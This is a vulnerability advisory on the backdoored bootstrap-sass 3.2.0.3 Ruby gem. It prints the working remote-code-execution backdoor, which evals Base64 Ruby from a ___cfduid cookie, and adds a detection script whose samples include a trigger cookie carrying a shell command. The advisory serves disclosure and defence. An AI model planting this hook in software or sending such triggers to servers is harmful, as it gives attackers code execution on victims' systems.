Malicious Package Affecting bootstrap-sass package, versions >=3.2.0.3, <3.2.0.4
Snyk ID: SNYK-RUBY-BOOTSTRAPSASS-174093
- published 3 Apr 2019
- disclosed 26 Mar 2019
- credit Derek Barnes
Introduced: 26 Mar 2019
CVE-2019-10842
How to fix?
Upgrade bootstrap-sass to 3.2.0.4 or later, which is outside the affected range, and never install 3.2.0.3. Treat any production system that ran 3.2.0.3 as potentially compromised: the backdoor executes attacker-supplied Ruby with the application's privileges, so check request logs for the trigger cookie and rotate secrets the application could reach.
Overview
bootstrap-sass is a Sass-powered version of Bootstrap 3, ready to drop right into your Sass powered applications.
Affected versions of this package are malicious. The file lib/active-controller/middleware.rb contains a backdoor that lets a remote attacker run arbitrary Ruby on the server: when the application runs in production, the backdoor reads a cookie named ___cfduid from each request, URL-safe Base64 decodes its value and passes the result to eval.
Details
When bootstrap-sass is required, it also loads the following malicious middleware code from lib/active-controller/middleware.rb:
begin
  require 'rack/sendfile'
  # Only armed in production: development and test runs never install the hook.
  if Rails.env.production?
    Rack::Sendfile.tap do |r|
      # Keep the original #call reachable as #c, then replace #call.
      r.send :alias_method, :c, :call
      r.send(:define_method, :call) do |e|
        begin
          # 'http_cookie'.upcase builds "HTTP_COOKIE" without the literal string.
          # Extract the value of a cookie named ___cfduid (one underscore more than
          # Cloudflare's __cfduid), URL-safe Base64 decode it and eval it as Ruby.
          x = Base64.urlsafe_decode64(e['http_cookie'.upcase].scan(/___cfduid=(.+);/).flatten[0].to_s)
          eval(x) if x
        rescue Exception
          # Every error is swallowed so a bad or missing cookie leaves no trace.
        end
        # Hand off to the real Rack::Sendfile#call; the response looks untouched.
        c(e)
      end
    end
  end
rescue Exception
  # Swallow load errors (for example, no Rails present) so the require never fails.
  nil
end
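Two things follow from the code above that matter when checking whether you were exposed: the hook is installed only when Rails.env.production? is true, so development and CI runs never exercise it, and a triggered request still goes through the real Rack::Sendfile#call, so nothing in the response reveals that eval ran. The practical signals are therefore the pinned gem version and the ___cfduid cookie in request logs. The following Ruby is an added example, not code from the Snyk advisory or from the bootstrap-sass project. It assumes Bundler's usual Gemfile.lock "specs:" layout, uses Gem::Version from RubyGems for the range comparison, and runs over constructed sample Cookie headers rather than captured traffic; the extraction deliberately reuses the backdoor's own regex and decoding so that it flags exactly the headers that would have reached eval.

```ruby
# Added example (not from the Snyk advisory or the bootstrap-sass project):
# two offline checks for the bootstrap-sass 3.2.0.3 backdoor.
#   1. affected_lock_version: is a Gemfile.lock pinned to the malicious range?
#   2. backdoor_payload / flag_requests: which Cookie headers would have
#      reached eval, extracted exactly the way the backdoor does it.
require 'base64'

# Affected range from the advisory: >= 3.2.0.3, < 3.2.0.4.
MALICIOUS_GEM = 'bootstrap-sass'
AFFECTED_FROM = Gem::Version.new('3.2.0.3')
FIXED_AT      = Gem::Version.new('3.2.0.4')

# Returns the pinned version string when the lockfile resolves bootstrap-sass
# to an affected version, nil otherwise. Assumes Bundler's "specs:" line
# layout: "    bootstrap-sass (3.2.0.3)". Dependency lines such as
# "  bootstrap-sass (~> 3.2.0)" are skipped because of the "~>".
def affected_lock_version(lockfile_text)
  lockfile_text.each_line do |line|
    m = line.match(/^\s+#{Regexp.escape(MALICIOUS_GEM)} \(([\d.]+)\)\s*$/)
    next unless m
    v = Gem::Version.new(m[1])
    return m[1] if v >= AFFECTED_FROM && v < FIXED_AT
  end
  nil
end

# Mirrors the backdoor's own extraction: the same regex over the raw Cookie
# header (three underscores, greedy capture, mandatory trailing ';'), then
# URL-safe Base64 decoding. Returns the decoded String when eval would have
# received it, nil when the backdoor would have done nothing.
def backdoor_payload(cookie_header)
  raw = cookie_header.to_s.scan(/___cfduid=(.+);/).flatten[0]
  return nil if raw.nil?
  decoded = Base64.urlsafe_decode64(raw)
  decoded.empty? ? nil : decoded
rescue ArgumentError
  # Not valid Base64: the backdoor rescues this too and just serves the request.
  nil
end

# Constructed sample requests (not captured traffic). Each is a request id and
# the raw Cookie header as Rack exposes it in env['HTTP_COOKIE'].
PAYLOAD_B64 = Base64.urlsafe_encode64('`id`')   # "YGlkYA=="
SAMPLE_REQUESTS = [
  # Cloudflare's real cookie has two underscores; the backdoor regex ignores it.
  { id: 1, cookie: '__cfduid=d41d8cd98f00b204e9800998ecf8427e; _session=abc' },
  # Trigger: three underscores, Base64 Ruby, followed by ';' and another cookie.
  { id: 2, cookie: "___cfduid=#{PAYLOAD_B64}; _session=abc" },
  # Same name but nothing after it: no trailing ';', so the regex never matches.
  { id: 3, cookie: "___cfduid=#{PAYLOAD_B64}" },
  # Garbage value: decoding fails, the backdoor swallows the error, nothing runs.
  { id: 4, cookie: '___cfduid=!!!not-base64!!!; _session=abc' },
]

# Returns [{id:, payload:}] for every request whose cookie would have been eval'd.
def flag_requests(requests)
  requests.map do |req|
    payload = backdoor_payload(req[:cookie])
    payload && { id: req[:id], payload: payload }
  end.compact
end

if __FILE__ == $PROGRAM_NAME
  flag_requests(SAMPLE_REQUESTS).each do |hit|
    puts "request #{hit[:id]}: would eval #{hit[:payload].inspect}"
  end
end
```

Because the backdoor's capture group is greedy and needs a ';' after it, the payload runs to the last ';' in the header; an attacker controlling the whole Cookie header simply sends the ___cfduid cookie followed by one dummy cookie, as sample request 2 does. When grepping real logs, match on the three-underscore name rather than on Base64 shape: legitimate Cloudflare traffic carries __cfduid with two underscores, so a ___cfduid cookie has no benign explanation.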